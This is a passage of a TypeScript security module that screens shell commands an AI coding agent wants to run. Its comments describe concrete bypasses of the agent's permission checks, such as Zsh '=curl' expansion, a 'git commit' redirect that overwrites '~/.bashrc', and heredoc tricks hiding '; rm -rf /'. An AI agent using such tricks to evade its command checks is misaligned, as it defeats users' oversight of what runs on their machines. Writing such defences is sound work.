tools/BashTool/bashSecurity.ts
100 KB2593 lines
src/tools/BashTool/bashSecurity.ts
1import { logEvent } from 'src/services/analytics/index.js'2import { extractHeredocs } from '../../utils/bash/heredoc.js'3import { ParsedCommand } from '../../utils/bash/ParsedCommand.js'4import {5 hasMalformedTokens,6 hasShellQuoteSingleQuoteBug,7 tryParseShellCommand,8} from '../../utils/bash/shellQuote.js'9import type { TreeSitterAnalysis } from '../../utils/bash/treeSitterAnalysis.js'10import type { PermissionResult } from '../../utils/permissions/PermissionResult.js'1112const HEREDOC_IN_SUBSTITUTION = /\$\(.*<</1314// Note: Backtick pattern is handled separately in validateDangerousPatterns15// to distinguish between escaped and unescaped backticks16const COMMAND_SUBSTITUTION_PATTERNS = [17 { pattern: /<\(/, message: 'process substitution <()' },18 { pattern: />\(/, message: 'process substitution >()' },19 { pattern: /=\(/, message: 'Zsh process substitution =()' },20 // Zsh EQUALS expansion: =cmd at word start expands to $(which cmd).21 // `=curl evil.com` → `/usr/bin/curl evil.com`, bypassing Bash(curl:*) deny22 // rules since the parser sees `=curl` as the base command, not `curl`.23 // Only matches word-initial = followed by a command-name char (not VAR=val).24 {25 pattern: /(?:^|[\s;&|])=[a-zA-Z_]/,26 message: 'Zsh equals expansion (=cmd)',27 },28 { pattern: /\$\(/, message: '$() command substitution' },29 { pattern: /\$\{/, message: '${} parameter substitution' },30 { pattern: /\$\[/, message: '$[] legacy arithmetic expansion' },31 { pattern: /~\[/, message: 'Zsh-style parameter expansion' },32 { pattern: /\(e:/, message: 'Zsh-style glob qualifiers' },33 { pattern: /\(\+/, message: 'Zsh glob qualifier with command execution' },34 {35 pattern: /\}\s*always\s*\{/,36 message: 'Zsh always block (try/always construct)',37 },38 // Defense in depth: Block PowerShell comment syntax even though we don't execute in PowerShell39 // Added as protection against future changes that might introduce PowerShell execution40 { pattern: /<#/, message: 'PowerShell comment syntax' },41]4243// Zsh-specific dangerous commands that can bypass security checks.44// These are checked against the base command (first word) of each command segment.45const ZSH_DANGEROUS_COMMANDS = new Set([46 // zmodload is the gateway to many dangerous module-based attacks:47 // zsh/mapfile (invisible file I/O via array assignment),48 // zsh/system (sysopen/syswrite two-step file access),49 // zsh/zpty (pseudo-terminal command execution),50 // zsh/net/tcp (network exfiltration via ztcp),51 // zsh/files (builtin rm/mv/ln/chmod that bypass binary checks)52 'zmodload',53 // emulate with -c flag is an eval-equivalent that executes arbitrary code54 'emulate',55 // Zsh module builtins that enable dangerous operations.56 // These require zmodload first, but we block them as defense-in-depth57 // in case zmodload is somehow bypassed or the module is pre-loaded.58 'sysopen', // Opens files with fine-grained control (zsh/system)59 'sysread', // Reads from file descriptors (zsh/system)60 'syswrite', // Writes to file descriptors (zsh/system)61 'sysseek', // Seeks on file descriptors (zsh/system)62 'zpty', // Executes commands on pseudo-terminals (zsh/zpty)63 'ztcp', // Creates TCP connections for exfiltration (zsh/net/tcp)64 'zsocket', // Creates Unix/TCP sockets (zsh/net/socket)65 'mapfile', // Not actually a command, but the associative array is set via zmodload66 'zf_rm', // Builtin rm from zsh/files67 'zf_mv', // Builtin mv from zsh/files68 'zf_ln', // Builtin ln from zsh/files69 'zf_chmod', // Builtin chmod from zsh/files70 'zf_chown', // Builtin chown from zsh/files71 'zf_mkdir', // Builtin mkdir from zsh/files72 'zf_rmdir', // Builtin rmdir from zsh/files73 'zf_chgrp', // Builtin chgrp from zsh/files74])7576// Numeric identifiers for bash security checks (to avoid logging strings)77const BASH_SECURITY_CHECK_IDS = {78 INCOMPLETE_COMMANDS: 1,79 JQ_SYSTEM_FUNCTION: 2,80 JQ_FILE_ARGUMENTS: 3,81 OBFUSCATED_FLAGS: 4,82 SHELL_METACHARACTERS: 5,83 DANGEROUS_VARIABLES: 6,84 NEWLINES: 7,85 DANGEROUS_PATTERNS_COMMAND_SUBSTITUTION: 8,86 DANGEROUS_PATTERNS_INPUT_REDIRECTION: 9,87 DANGEROUS_PATTERNS_OUTPUT_REDIRECTION: 10,88 IFS_INJECTION: 11,89 GIT_COMMIT_SUBSTITUTION: 12,90 PROC_ENVIRON_ACCESS: 13,91 MALFORMED_TOKEN_INJECTION: 14,92 BACKSLASH_ESCAPED_WHITESPACE: 15,93 BRACE_EXPANSION: 16,94 CONTROL_CHARACTERS: 17,95 UNICODE_WHITESPACE: 18,96 MID_WORD_HASH: 19,97 ZSH_DANGEROUS_COMMANDS: 20,98 BACKSLASH_ESCAPED_OPERATORS: 21,99 COMMENT_QUOTE_DESYNC: 22,100 QUOTED_NEWLINE: 23,101} as const102103type ValidationContext = {104 originalCommand: string105 baseCommand: string106 unquotedContent: string107 fullyUnquotedContent: string108 /** fullyUnquoted before stripSafeRedirections — used by validateBraceExpansion109 * to avoid false negatives from redirection stripping creating backslash adjacencies */110 fullyUnquotedPreStrip: string111 /** Like fullyUnquotedPreStrip but preserves quote characters ('/"): e.g.,112 * echo 'x'# → echo ''# (the quote chars remain, revealing adjacency to #) */113 unquotedKeepQuoteChars: string114 /** Tree-sitter analysis data, if available. Validators can use this for115 * more accurate analysis when present, falling back to regex otherwise. */116 treeSitter?: TreeSitterAnalysis | null117}118119type QuoteExtraction = {120 withDoubleQuotes: string121 fullyUnquoted: string122 /** Like fullyUnquoted but preserves quote characters ('/"): strips quoted123 * content while keeping the delimiters. Used by validateMidWordHash to detect124 * quote-adjacent # (e.g., 'x'# where quote stripping would hide adjacency). */125 unquotedKeepQuoteChars: string126}127128function extractQuotedContent(command: string, isJq = false): QuoteExtraction {129 let withDoubleQuotes = ''130 let fullyUnquoted = ''131 let unquotedKeepQuoteChars = ''132 let inSingleQuote = false133 let inDoubleQuote = false134 let escaped = false135136 for (let i = 0; i < command.length; i++) {137 const char = command[i]138139 if (escaped) {140 escaped = false141 if (!inSingleQuote) withDoubleQuotes += char142 if (!inSingleQuote && !inDoubleQuote) fullyUnquoted += char143 if (!inSingleQuote && !inDoubleQuote) unquotedKeepQuoteChars += char144 continue145 }146147 if (char === '\\' && !inSingleQuote) {148 escaped = true149 if (!inSingleQuote) withDoubleQuotes += char150 if (!inSingleQuote && !inDoubleQuote) fullyUnquoted += char151 if (!inSingleQuote && !inDoubleQuote) unquotedKeepQuoteChars += char152 continue153 }154155 if (char === "'" && !inDoubleQuote) {156 inSingleQuote = !inSingleQuote157 unquotedKeepQuoteChars += char158 continue159 }160161 if (char === '"' && !inSingleQuote) {162 inDoubleQuote = !inDoubleQuote163 unquotedKeepQuoteChars += char164 // For jq, include quotes in extraction to ensure content is properly analyzed165 if (!isJq) continue166 }167168 if (!inSingleQuote) withDoubleQuotes += char169 if (!inSingleQuote && !inDoubleQuote) fullyUnquoted += char170 if (!inSingleQuote && !inDoubleQuote) unquotedKeepQuoteChars += char171 }172173 return { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars }174}175176function stripSafeRedirections(content: string): string {177 // SECURITY: All three patterns MUST have a trailing boundary (?=\s|$).178 // Without it, `> /dev/nullo` matches `/dev/null` as a PREFIX, strips179 // `> /dev/null` leaving `o`, so `echo hi > /dev/nullo` becomes `echo hi o`.180 // validateRedirections then sees no `>` and passes. The file write to181 // /dev/nullo is auto-allowed via the read-only path (checkReadOnlyConstraints).182 // Main bashPermissions flow is protected (checkPathConstraints validates the183 // original command), but speculation.ts uses checkReadOnlyConstraints alone.184 return content185 .replace(/\s+2\s*>&\s*1(?=\s|$)/g, '')186 .replace(/[012]?\s*>\s*\/dev\/null(?=\s|$)/g, '')187 .replace(/\s*<\s*\/dev\/null(?=\s|$)/g, '')188}189190/**191 * Checks if content contains an unescaped occurrence of a single character.192 * Handles bash escape sequences correctly where a backslash escapes the following character.193 *194 * IMPORTANT: This function only handles single characters, not strings. If you need to extend195 * this to handle multi-character strings, be EXTREMELY CAREFUL about shell ANSI-C quoting196 * (e.g., $'\n', $'\x41', $'\u0041') which can encode arbitrary characters and strings in ways197 * that are very difficult to parse correctly. Incorrect handling could introduce security198 * vulnerabilities by allowing attackers to bypass security checks.199 *200 * @param content - The string to search (typically from extractQuotedContent)201 * @param char - Single character to search for (e.g., '`')202 * @returns true if unescaped occurrence found, false otherwise203 *204 * Examples:205 * hasUnescapedChar("test \`safe\`", '`') → false (escaped backticks)206 * hasUnescapedChar("test `dangerous`", '`') → true (unescaped backticks)207 * hasUnescapedChar("test\\`date`", '`') → true (escaped backslash + unescaped backtick)208 */209function hasUnescapedChar(content: string, char: string): boolean {210 if (char.length !== 1) {211 throw new Error('hasUnescapedChar only works with single characters')212 }213214 let i = 0215 while (i < content.length) {216 // If we see a backslash, skip it and the next character (they form an escape sequence)217 if (content[i] === '\\' && i + 1 < content.length) {218 i += 2 // Skip backslash and escaped character219 continue220 }221222 // Check if current character matches223 if (content[i] === char) {224 return true // Found unescaped occurrence225 }226227 i++228 }229230 return false // No unescaped occurrences found231}232233function validateEmpty(context: ValidationContext): PermissionResult {234 if (!context.originalCommand.trim()) {235 return {236 behavior: 'allow',237 updatedInput: { command: context.originalCommand },238 decisionReason: { type: 'other', reason: 'Empty command is safe' },239 }240 }241 return { behavior: 'passthrough', message: 'Command is not empty' }242}243244function validateIncompleteCommands(245 context: ValidationContext,246): PermissionResult {247 const { originalCommand } = context248 const trimmed = originalCommand.trim()249250 if (/^\s*\t/.test(originalCommand)) {251 logEvent('tengu_bash_security_check_triggered', {252 checkId: BASH_SECURITY_CHECK_IDS.INCOMPLETE_COMMANDS,253 subId: 1,254 })255 return {256 behavior: 'ask',257 message: 'Command appears to be an incomplete fragment (starts with tab)',258 }259 }260261 if (trimmed.startsWith('-')) {262 logEvent('tengu_bash_security_check_triggered', {263 checkId: BASH_SECURITY_CHECK_IDS.INCOMPLETE_COMMANDS,264 subId: 2,265 })266 return {267 behavior: 'ask',268 message:269 'Command appears to be an incomplete fragment (starts with flags)',270 }271 }272273 if (/^\s*(&&|\|\||;|>>?|<)/.test(originalCommand)) {274 logEvent('tengu_bash_security_check_triggered', {275 checkId: BASH_SECURITY_CHECK_IDS.INCOMPLETE_COMMANDS,276 subId: 3,277 })278 return {279 behavior: 'ask',280 message:281 'Command appears to be a continuation line (starts with operator)',282 }283 }284285 return { behavior: 'passthrough', message: 'Command appears complete' }286}287288/**289 * Checks if a command is a "safe" heredoc-in-substitution pattern that can290 * bypass the generic $() validator.291 *292 * This is an EARLY-ALLOW path: returning `true` causes bashCommandIsSafe to293 * return `passthrough`, bypassing ALL subsequent validators. Given this294 * authority, the check must be PROVABLY safe, not "probably safe".295 *296 * The only pattern we allow is:297 * [prefix] $(cat <<'DELIM'\n298 * [body lines]\n299 * DELIM\n300 * ) [suffix]301 *302 * Where:303 * - The delimiter must be single-quoted ('DELIM') or escaped (\DELIM) so the304 * body is literal text with no expansion305 * - The closing delimiter must be on a line BY ITSELF (or with only trailing306 * whitespace + `)` for the $(cat <<'EOF'\n...\nEOF)` inline form)307 * - The closing delimiter must be the FIRST such line — matching bash's308 * behavior exactly (no skipping past early delimiters to find EOF))309 * - There must be non-whitespace text BEFORE the $( (i.e., the substitution310 * is used in argument position, not as a command name). Otherwise the311 * heredoc body becomes an arbitrary command name with [suffix] as args.312 * - The remaining text (with the heredoc stripped) must pass all validators313 *314 * This implementation uses LINE-BASED matching, not regex [\s\S]*?, to315 * precisely replicate bash's heredoc-closing behavior.316 */317function isSafeHeredoc(command: string): boolean {318 if (!HEREDOC_IN_SUBSTITUTION.test(command)) return false319320 // SECURITY: Use [ \t] (not \s) between << and the delimiter. \s matches321 // newlines, but bash requires the delimiter word on the same line as <<.322 // Matching across newlines could accept malformed syntax that bash rejects.323 // Handle quote variations: 'EOF', ''EOF'' (splitCommand may mangle quotes).324 const heredocPattern =325 /\$\(cat[ \t]*<<(-?)[ \t]*(?:'+([A-Za-z_]\w*)'+|\\([A-Za-z_]\w*))/g326 let match327 type HeredocMatch = {328 start: number329 operatorEnd: number330 delimiter: string331 isDash: boolean332 }333 const safeHeredocs: HeredocMatch[] = []334335 while ((match = heredocPattern.exec(command)) !== null) {336 const delimiter = match[2] || match[3]337 if (delimiter) {338 safeHeredocs.push({339 start: match.index,340 operatorEnd: match.index + match[0].length,341 delimiter,342 isDash: match[1] === '-',343 })344 }345 }346347 // If no safe heredoc patterns found, it's not safe348 if (safeHeredocs.length === 0) return false349350 // SECURITY: For each heredoc, find the closing delimiter using LINE-BASED351 // matching that exactly replicates bash's behavior. Bash closes a heredoc352 // at the FIRST line that exactly matches the delimiter. Any subsequent353 // occurrence of the delimiter is just content (or a new command). Regex354 // [\s\S]*? can skip past the first delimiter to find a later `DELIM)`355 // pattern, hiding injected commands between the two delimiters.356 type VerifiedHeredoc = { start: number; end: number }357 const verified: VerifiedHeredoc[] = []358359 for (const { start, operatorEnd, delimiter, isDash } of safeHeredocs) {360 // The opening line must end immediately after the delimiter (only361 // horizontal whitespace allowed before the newline). If there's other362 // content (like `; rm -rf /`), this is not a simple safe heredoc.363 const afterOperator = command.slice(operatorEnd)364 const openLineEnd = afterOperator.indexOf('\n')365 if (openLineEnd === -1) return false // No content at all366 const openLineTail = afterOperator.slice(0, openLineEnd)367 if (!/^[ \t]*$/.test(openLineTail)) return false // Extra content on open line368369 // Body starts after the newline370 const bodyStart = operatorEnd + openLineEnd + 1371 const body = command.slice(bodyStart)372 const bodyLines = body.split('\n')373374 // Find the FIRST line that closes the heredoc. There are two valid forms:375 // 1. `DELIM` alone on a line (bash-standard), followed by `)` on the376 // next line (with only whitespace before it)377 // 2. `DELIM)` on a line (the inline $(cat <<'EOF'\n...\nEOF) form,378 // where bash's PST_EOFTOKEN closes both heredoc and substitution)379 // For <<-, leading tabs are stripped before matching.380 let closingLineIdx = -1381 let closeParenLineIdx = -1 // Line index where `)` appears382 let closeParenColIdx = -1 // Column index of `)` on that line383384 for (let i = 0; i < bodyLines.length; i++) {385 const rawLine = bodyLines[i]!386 const line = isDash ? rawLine.replace(/^\t*/, '') : rawLine387388 // Form 1: delimiter alone on a line389 if (line === delimiter) {390 closingLineIdx = i391 // The `)` must be on the NEXT line with only whitespace before it392 const nextLine = bodyLines[i + 1]393 if (nextLine === undefined) return false // No closing `)`394 const parenMatch = nextLine.match(/^([ \t]*)\)/)395 if (!parenMatch) return false // `)` not at start of next line396 closeParenLineIdx = i + 1397 closeParenColIdx = parenMatch[1]!.length // Position of `)`398 break399 }400401 // Form 2: delimiter immediately followed by `)` (PST_EOFTOKEN form)402 // Only whitespace allowed between delimiter and `)`.403 if (line.startsWith(delimiter)) {404 const afterDelim = line.slice(delimiter.length)405 const parenMatch = afterDelim.match(/^([ \t]*)\)/)406 if (parenMatch) {407 closingLineIdx = i408 closeParenLineIdx = i409 // Column is in rawLine (pre-tab-strip), so recompute410 const tabPrefix = isDash ? (rawLine.match(/^\t*/)?.[0] ?? '') : ''411 closeParenColIdx =412 tabPrefix.length + delimiter.length + parenMatch[1]!.length413 break414 }415 // Line starts with delimiter but has other trailing content —416 // this is NOT the closing line (bash requires exact match or EOF`)`).417 // But it's also a red flag: if this were inside $(), bash might418 // close early via PST_EOFTOKEN with other shell metacharacters.419 // We already handle that case in extractHeredocs — here we just420 // reject it as not matching our safe pattern.421 if (/^[)}`|&;(<>]/.test(afterDelim)) {422 return false // Ambiguous early-closure pattern423 }424 }425 }426427 if (closingLineIdx === -1) return false // No closing delimiter found428429 // Compute the absolute end position (one past the `)` character)430 let endPos = bodyStart431 for (let i = 0; i < closeParenLineIdx; i++) {432 endPos += bodyLines[i]!.length + 1 // +1 for newline433 }434 endPos += closeParenColIdx + 1 // +1 to include the `)` itself435436 verified.push({ start, end: endPos })437 }438439 // SECURITY: Reject nested matches. The regex finds $(cat <<'X' patterns440 // in RAW TEXT without understanding quoted-heredoc semantics. When the441 // outer heredoc has a quoted delimiter (<<'A'), its body is LITERAL text442 // in bash — any inner $(cat <<'B' is just characters, not a real heredoc.443 // But our regex matches both, producing NESTED ranges. Stripping nested444 // ranges corrupts indices: after stripping the inner range, the outer445 // range's `end` is stale (points past the shrunken string), causing446 // `remaining.slice(end)` to return '' and silently drop any suffix447 // (e.g., `; rm -rf /`). Since all our matched heredocs have quoted/escaped448 // delimiters, a nested match inside the body is ALWAYS literal text —449 // no legitimate user writes this pattern. Bail to safe fallback.450 for (const outer of verified) {451 for (const inner of verified) {452 if (inner === outer) continue453 if (inner.start > outer.start && inner.start < outer.end) {454 return false455 }456 }457 }458459 // Strip all verified heredocs from the command, building `remaining`.460 // Process in reverse order so earlier indices stay valid.461 const sortedVerified = [...verified].sort((a, b) => b.start - a.start)462 let remaining = command463 for (const { start, end } of sortedVerified) {464 remaining = remaining.slice(0, start) + remaining.slice(end)465 }466467 // SECURITY: The remaining text must NOT start with only whitespace before468 // the (now-stripped) heredoc position IF there's non-whitespace after it.469 // If the $() is in COMMAND-NAME position (no prefix), its output becomes470 // the command to execute, with any suffix text as arguments:471 // $(cat <<'EOF'\nchmod\nEOF\n) 777 /etc/shadow472 // → runs `chmod 777 /etc/shadow`473 // We only allow the substitution in ARGUMENT position: there must be a474 // command word before the $(.475 // After stripping, `remaining` should look like `cmd args... [more args]`.476 // If remaining starts with only whitespace (or is empty), the $() WAS the477 // command — that's only safe if there are no trailing arguments.478 const trimmedRemaining = remaining.trim()479 if (trimmedRemaining.length > 0) {480 // There's a prefix command — good. But verify the original command481 // also had a non-whitespace prefix before the FIRST $( (the heredoc482 // could be one of several; we need the first one's prefix).483 const firstHeredocStart = Math.min(...verified.map(v => v.start))484 const prefix = command.slice(0, firstHeredocStart)485 if (prefix.trim().length === 0) {486 // $() is in command-name position but there's trailing text — UNSAFE.487 // The heredoc body becomes the command name, trailing text becomes args.488 return false489 }490 }491492 // Check that remaining text contains only safe characters.493 // After stripping safe heredocs, the remaining text should only be command494 // names, arguments, quotes, and whitespace. Reject ANY shell metacharacter495 // to prevent operators (|, &, &&, ||, ;) or expansions ($, `, {, <, >) from496 // being used to chain dangerous commands after a safe heredoc.497 // SECURITY: Use explicit ASCII space/tab only — \s matches unicode whitespace498 // like \u00A0 which can be used to hide content. Newlines are also blocked499 // (they would indicate multi-line commands outside the heredoc body).500 if (!/^[a-zA-Z0-9 \t"'.\-/_@=,:+~]*$/.test(remaining)) return false501502 // SECURITY: The remaining text (command with heredocs stripped) must also503 // pass all security validators. Without this, appending a safe heredoc to a504 // dangerous command (e.g., `zmodload zsh/system $(cat <<'EOF'\nx\nEOF\n)`)505 // causes this early-allow path to return passthrough, bypassing506 // validateZshDangerousCommands, validateProcEnvironAccess, and any other507 // main validator that checks allowlist-safe character patterns.508 // No recursion risk: `remaining` has no `$(... <<` pattern, so the recursive509 // call's validateSafeCommandSubstitution returns passthrough immediately.510 if (bashCommandIsSafe_DEPRECATED(remaining).behavior !== 'passthrough')511 return false512513 return true514}515516/**517 * Detects well-formed $(cat <<'DELIM'...DELIM) heredoc substitution patterns.518 * Returns the command with matched heredocs stripped, or null if none found.519 * Used by the pre-split gate to strip safe heredocs and re-check the remainder.520 */521export function stripSafeHeredocSubstitutions(command: string): string | null {522 if (!HEREDOC_IN_SUBSTITUTION.test(command)) return null523524 const heredocPattern =525 /\$\(cat[ \t]*<<(-?)[ \t]*(?:'+([A-Za-z_]\w*)'+|\\([A-Za-z_]\w*))/g526 let result = command527 let found = false528 let match529 const ranges: Array<{ start: number; end: number }> = []530 while ((match = heredocPattern.exec(command)) !== null) {531 if (match.index > 0 && command[match.index - 1] === '\\') continue532 const delimiter = match[2] || match[3]533 if (!delimiter) continue534 const isDash = match[1] === '-'535 const operatorEnd = match.index + match[0].length536537 const afterOperator = command.slice(operatorEnd)538 const openLineEnd = afterOperator.indexOf('\n')539 if (openLineEnd === -1) continue540 if (!/^[ \t]*$/.test(afterOperator.slice(0, openLineEnd))) continue541542 const bodyStart = operatorEnd + openLineEnd + 1543 const bodyLines = command.slice(bodyStart).split('\n')544 for (let i = 0; i < bodyLines.length; i++) {545 const rawLine = bodyLines[i]!546 const line = isDash ? rawLine.replace(/^\t*/, '') : rawLine547 if (line.startsWith(delimiter)) {548 const after = line.slice(delimiter.length)549 let closePos = -1550 if (/^[ \t]*\)/.test(after)) {551 const lineStart =552 bodyStart +553 bodyLines.slice(0, i).join('\n').length +554 (i > 0 ? 1 : 0)555 closePos = command.indexOf(')', lineStart)556 } else if (after === '') {557 const nextLine = bodyLines[i + 1]558 if (nextLine !== undefined && /^[ \t]*\)/.test(nextLine)) {559 const nextLineStart =560 bodyStart + bodyLines.slice(0, i + 1).join('\n').length + 1561 closePos = command.indexOf(')', nextLineStart)562 }563 }564 if (closePos !== -1) {565 ranges.push({ start: match.index, end: closePos + 1 })566 found = true567 }568 break569 }570 }571 }572 if (!found) return null573 for (let i = ranges.length - 1; i >= 0; i--) {574 const r = ranges[i]!575 result = result.slice(0, r.start) + result.slice(r.end)576 }577 return result578}579580/** Detection-only check: does the command contain a safe heredoc substitution? */581export function hasSafeHeredocSubstitution(command: string): boolean {582 return stripSafeHeredocSubstitutions(command) !== null583}584585function validateSafeCommandSubstitution(586 context: ValidationContext,587): PermissionResult {588 const { originalCommand } = context589590 if (!HEREDOC_IN_SUBSTITUTION.test(originalCommand)) {591 return { behavior: 'passthrough', message: 'No heredoc in substitution' }592 }593594 if (isSafeHeredoc(originalCommand)) {595 return {596 behavior: 'allow',597 updatedInput: { command: originalCommand },598 decisionReason: {599 type: 'other',600 reason:601 'Safe command substitution: cat with quoted/escaped heredoc delimiter',602 },603 }604 }605606 return {607 behavior: 'passthrough',608 message: 'Command substitution needs validation',609 }610}611612function validateGitCommit(context: ValidationContext): PermissionResult {613 const { originalCommand, baseCommand } = context614615 if (baseCommand !== 'git' || !/^git\s+commit\s+/.test(originalCommand)) {616 return { behavior: 'passthrough', message: 'Not a git commit' }617 }618619 // SECURITY: Backslashes can cause our regex to mis-identify quote boundaries620 // (e.g., `git commit -m "test\"msg" && evil`). Legitimate commit messages621 // virtually never contain backslashes, so bail to the full validator chain.622 if (originalCommand.includes('\\')) {623 return {624 behavior: 'passthrough',625 message: 'Git commit contains backslash, needs full validation',626 }627 }628629 // SECURITY: The `.*?` before `-m` must NOT match shell operators. Previously630 // `.*?` matched anything except `\n`, including `;`, `&`, `|`, `` ` ``, `$(`.631 // For `git commit ; curl evil.com -m 'x'`, `.*?` swallowed `; curl evil.com `632 // leaving remainder=`` (falsy → remainder check skipped) → returned `allow`633 // for a compound command. Early-allow skips ALL main validators (line ~1908),634 // nullifying validateQuotedNewline, validateBackslashEscapedOperators, etc.635 // While splitCommand currently catches this downstream, early-allow is a636 // POSITIVE ASSERTION that the FULL command is safe — which it is NOT.637 //638 // Also: `\s+` between `git` and `commit` must NOT match `\n`/`\r` (command639 // separators in bash). Use `[ \t]+` for horizontal-only whitespace.640 //641 // The `[^;&|`$<>()\n\r]*?` class excludes shell metacharacters. We also642 // exclude `<` and `>` here (redirects) — they're allowed in the REMAINDER643 // for `--author="Name <email>"` but must not appear BEFORE `-m`.644 const messageMatch = originalCommand.match(645 /^git[ \t]+commit[ \t]+[^;&|`$<>()\n\r]*?-m[ \t]+(["'])([\s\S]*?)\1(.*)$/,646 )647648 if (messageMatch) {649 const [, quote, messageContent, remainder] = messageMatch650651 if (quote === '"' && messageContent && /\$\(|`|\$\{/.test(messageContent)) {652 logEvent('tengu_bash_security_check_triggered', {653 checkId: BASH_SECURITY_CHECK_IDS.GIT_COMMIT_SUBSTITUTION,654 subId: 1,655 })656 return {657 behavior: 'ask',658 message: 'Git commit message contains command substitution patterns',659 }660 }661662 // SECURITY: Check remainder for shell operators that could chain commands663 // or redirect output. The `.*` before `-m` in the regex can swallow flags664 // like `--amend`, leaving `&& evil` or `> ~/.bashrc` in the remainder.665 // Previously we only checked for $() / `` / ${} here, missing operators666 // like ; | & && || < >.667 //668 // `<` and `>` can legitimately appear INSIDE quotes in --author values669 // like `--author="Name <email>"`. An UNQUOTED `>` is a shell redirect670 // operator. Because validateGitCommit is an EARLY validator, returning671 // `allow` here short-circuits bashCommandIsSafe and SKIPS672 // validateRedirections. So we must bail to passthrough on unquoted `<>`673 // to let the main validators handle it.674 //675 // Attack: `git commit --allow-empty -m 'payload' > ~/.bashrc`676 // validateGitCommit returns allow → bashCommandIsSafe short-circuits →677 // validateRedirections NEVER runs → ~/.bashrc overwritten with git678 // stdout containing `payload` → RCE on next shell login.679 if (remainder && /[;|&()`]|\$\(|\$\{/.test(remainder)) {680 return {681 behavior: 'passthrough',682 message: 'Git commit remainder contains shell metacharacters',683 }684 }685 if (remainder) {686 // Strip quoted content, then check for `<` or `>`. Quoted `<>` (email687 // brackets in --author) are safe; unquoted `<>` are shell redirects.688 // NOTE: This simple quote tracker has NO backslash handling. `\'`/`\"`689 // outside quotes would desync it (bash: \' = literal ', tracker: toggles690 // SQ). BUT line 584 already bailed on ANY backslash in originalCommand,691 // so we never reach here with backslashes. For backslash-free input,692 // simple quote toggling is correct (no way to escape quotes without \\).693 let unquoted = ''694 let inSQ = false695 let inDQ = false696 for (let i = 0; i < remainder.length; i++) {697 const c = remainder[i]698 if (c === "'" && !inDQ) {699 inSQ = !inSQ700 continue701 }702 if (c === '"' && !inSQ) {703 inDQ = !inDQ704 continue705 }706 if (!inSQ && !inDQ) unquoted += c707 }708 if (/[<>]/.test(unquoted)) {709 return {710 behavior: 'passthrough',711 message: 'Git commit remainder contains unquoted redirect operator',712 }713 }714 }715716 // Security hardening: block messages starting with dash717 // This catches potential obfuscation patterns like git commit -m "---"718 if (messageContent && messageContent.startsWith('-')) {719 logEvent('tengu_bash_security_check_triggered', {720 checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,721 subId: 5,722 })723 return {724 behavior: 'ask',725 message: 'Command contains quoted characters in flag names',726 }727 }728729 return {730 behavior: 'allow',731 updatedInput: { command: originalCommand },732 decisionReason: {733 type: 'other',734 reason: 'Git commit with simple quoted message is allowed',735 },736 }737 }738739 return { behavior: 'passthrough', message: 'Git commit needs validation' }740}741742function validateJqCommand(context: ValidationContext): PermissionResult {743 const { originalCommand, baseCommand } = context744745 if (baseCommand !== 'jq') {746 return { behavior: 'passthrough', message: 'Not jq' }747 }748749 if (/\bsystem\s*\(/.test(originalCommand)) {750 logEvent('tengu_bash_security_check_triggered', {751 checkId: BASH_SECURITY_CHECK_IDS.JQ_SYSTEM_FUNCTION,752 subId: 1,753 })754 return {755 behavior: 'ask',756 message:757 'jq command contains system() function which executes arbitrary commands',758 }759 }760761 // File arguments are now allowed - they will be validated by path validation in readOnlyValidation.ts762 // Only block dangerous flags that could read files into jq variables763 const afterJq = originalCommand.substring(3).trim()764 if (765 /(?:^|\s)(?:-f\b|--from-file|--rawfile|--slurpfile|-L\b|--library-path)/.test(766 afterJq,767 )768 ) {769 logEvent('tengu_bash_security_check_triggered', {770 checkId: BASH_SECURITY_CHECK_IDS.JQ_FILE_ARGUMENTS,771 subId: 1,772 })773 return {774 behavior: 'ask',775 message:776 'jq command contains dangerous flags that could execute code or read arbitrary files',777 }778 }779780 return { behavior: 'passthrough', message: 'jq command is safe' }781}782783function validateShellMetacharacters(784 context: ValidationContext,785): PermissionResult {786 const { unquotedContent } = context787 const message =788 'Command contains shell metacharacters (;, |, or &) in arguments'789790 if (/(?:^|\s)["'][^"']*[;&][^"']*["'](?:\s|$)/.test(unquotedContent)) {791 logEvent('tengu_bash_security_check_triggered', {792 checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,793 subId: 1,794 })795 return { behavior: 'ask', message }796 }797798 const globPatterns = [799 /-name\s+["'][^"']*[;|&][^"']*["']/,800 /-path\s+["'][^"']*[;|&][^"']*["']/,801 /-iname\s+["'][^"']*[;|&][^"']*["']/,802 ]803804 if (globPatterns.some(p => p.test(unquotedContent))) {805 logEvent('tengu_bash_security_check_triggered', {806 checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,807 subId: 2,808 })809 return { behavior: 'ask', message }810 }811812 if (/-regex\s+["'][^"']*[;&][^"']*["']/.test(unquotedContent)) {813 logEvent('tengu_bash_security_check_triggered', {814 checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,815 subId: 3,816 })817 return { behavior: 'ask', message }818 }819820 return { behavior: 'passthrough', message: 'No metacharacters' }821}822823function validateDangerousVariables(824 context: ValidationContext,825): PermissionResult {826 const { fullyUnquotedContent } = context827828 if (829 /[<>|]\s*\$[A-Za-z_]/.test(fullyUnquotedContent) ||830 /\$[A-Za-z_][A-Za-z0-9_]*\s*[|<>]/.test(fullyUnquotedContent)831 ) {832 logEvent('tengu_bash_security_check_triggered', {833 checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_VARIABLES,834 subId: 1,835 })836 return {837 behavior: 'ask',838 message:839 'Command contains variables in dangerous contexts (redirections or pipes)',840 }841 }842843 return { behavior: 'passthrough', message: 'No dangerous variables' }844}845846function validateDangerousPatterns(847 context: ValidationContext,848): PermissionResult {849 const { unquotedContent } = context850851 // Special handling for backticks - check for UNESCAPED backticks only852 // Escaped backticks (e.g., \`) are safe and commonly used in SQL commands853 if (hasUnescapedChar(unquotedContent, '`')) {854 return {855 behavior: 'ask',856 message: 'Command contains backticks (`) for command substitution',857 }858 }859860 // Other command substitution checks (include double-quoted content)861 for (const { pattern, message } of COMMAND_SUBSTITUTION_PATTERNS) {862 if (pattern.test(unquotedContent)) {863 logEvent('tengu_bash_security_check_triggered', {864 checkId:865 BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_COMMAND_SUBSTITUTION,866 subId: 1,867 })868 return { behavior: 'ask', message: `Command contains ${message}` }869 }870 }871872 return { behavior: 'passthrough', message: 'No dangerous patterns' }873}874875function validateRedirections(context: ValidationContext): PermissionResult {876 const { fullyUnquotedContent } = context877878 if (/</.test(fullyUnquotedContent)) {879 